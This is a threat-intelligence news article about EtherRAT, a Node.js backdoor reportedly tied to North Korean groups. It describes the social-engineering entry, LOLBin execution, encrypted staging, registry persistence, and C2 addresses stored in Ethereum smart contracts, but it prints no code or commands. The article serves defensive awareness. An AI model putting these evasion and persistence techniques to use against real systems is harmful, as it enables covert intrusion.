Takedown-Proof: Inside the Ethereum-Powered “EtherRAT” and North Korea’s New Blockchain Backdoor
Ddos 
Attack Diagram | Image: eSentire Threat Response Unit
In a sophisticated blend of social engineering and decentralized technology, eSentire’s Threat Response Unit (TRU) recently detected a new wave of EtherRAT malware targeting the retail industry. This Node.js-based backdoor is not your run-of-the-mill threat; it is reportedly linked to North Korean advanced persistent threat (APT) groups and utilizes the Ethereum blockchain to ensure its command-and-control (C2) infrastructure remains “takedown-proof”.
The attack begins with high-pressure social engineering. TRU observed the use of ClickFix and IT Support scams—often conducted over Microsoft Teams—to trick victims into executing malicious commands.
The technical execution is a masterclass in evasion:
- Initial Access: Using “Indirect Command Execution,” the malware employs the Windows LOLBin pcalua.exe to bypass security restrictions and retrieve a malicious HTA script.
- Stealthy Deployment: The infection moves through multiple stages, using AES-256-CBC encryption to hide its payload. As noted in the analysis, “The first stage Node.js script simply decrypts/executes the next stage”.
- Persistence: To stay on the machine, EtherRAT establishes a foothold via the Windows Registry, using conhost.exe to proxy-execute its malicious code under the guise of a headless process.
What sets EtherRAT apart is its use of EtherHiding. Instead of hardcoding a server address that law enforcement could easily seize, the malware retrieves its C2 instructions from Ethereum smart contracts.
“EtherRAT allows threat actors to run arbitrary commands on compromised hosts… [and makes] C2 addresses more resilient by storing and updating them in Ethereum smart contracts”.
This technique allows hackers to rotate their infrastructure at a minimal cost, effectively reasserting control over older infected machines even after a primary server is taken down.
EtherRAT is highly selective. Once it compromises a host, it deploys a module dubbed SYS_INFO to perform extensive fingerprinting. It collects everything from GPU names and public IP addresses to installed antivirus software.
Interestingly, the malware contains a built-in “moral compass” or, more accurately, a geopolitical filter. Before fully engaging, it checks for CIS (Commonwealth of Independent States) languages, such as Russian, Belarusian, or Kazakh. “If any language matches, it ‘self-destructs’ by deleting itself and exiting”.
Modern threats are increasingly leveraging decentralized technologies to outpace traditional defenses. Vigilance against social engineering—particularly via collaboration tools like Microsoft Teams—remains the first and most critical line of defense.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
